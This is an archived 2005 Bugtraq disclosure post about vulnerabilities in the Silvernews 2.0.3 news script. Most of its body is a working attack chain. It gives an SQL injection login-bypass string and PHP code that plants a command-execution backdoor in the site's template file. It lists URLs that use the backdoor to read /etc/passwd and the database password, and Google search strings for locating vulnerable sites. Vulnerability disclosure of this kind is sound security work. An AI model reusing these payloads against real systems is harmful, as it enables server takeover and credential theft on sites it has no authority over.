lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050803161957.30221.qmail@securityfocus.com>
Date: 3 Aug 2005 16:19:57 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: Silvernews 2.0.3 (possibly previous versions ) SQL Injection /
 Login Bypass / Remote commands execution / cross site scripting


Silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting

software:
author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews

SQL Injection / Login bypass:

A user can bypass admin password check, if magic_quotes is set to off: 

user: ' or isnull(1/0) /*
pass: whatever


remote commands execution:

now, new admin can edit template, clicking on Templates -> Global footer, can
add the lines:

//***********************************************
</body>
</html>

TEMPLATE;
}
}
system($HTTP_GET_VARS[command]);

/*

to leave a backdoor in template file /templates/tpl_global.php
now can launch system commands on the target system with theese urls:

http://[target]/[path]//templates/tpl_global.php?command=ls%20-la

to list directories

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd

to see /etc/passwd file

http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php

to see Mysql database password (look inside html...)


cross site scripting:

same way, a user can hide evil javascript code in template 


googledork: "Powered by SilverNews" 
or:         intitle:"SilverNews 2.0 Admin control panel" 


rgod
email: retrogod [at] aliceposta.it
site: http://rgod.altervista.org


original advisory: http://www.rgod.altervista.org/silvernews.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ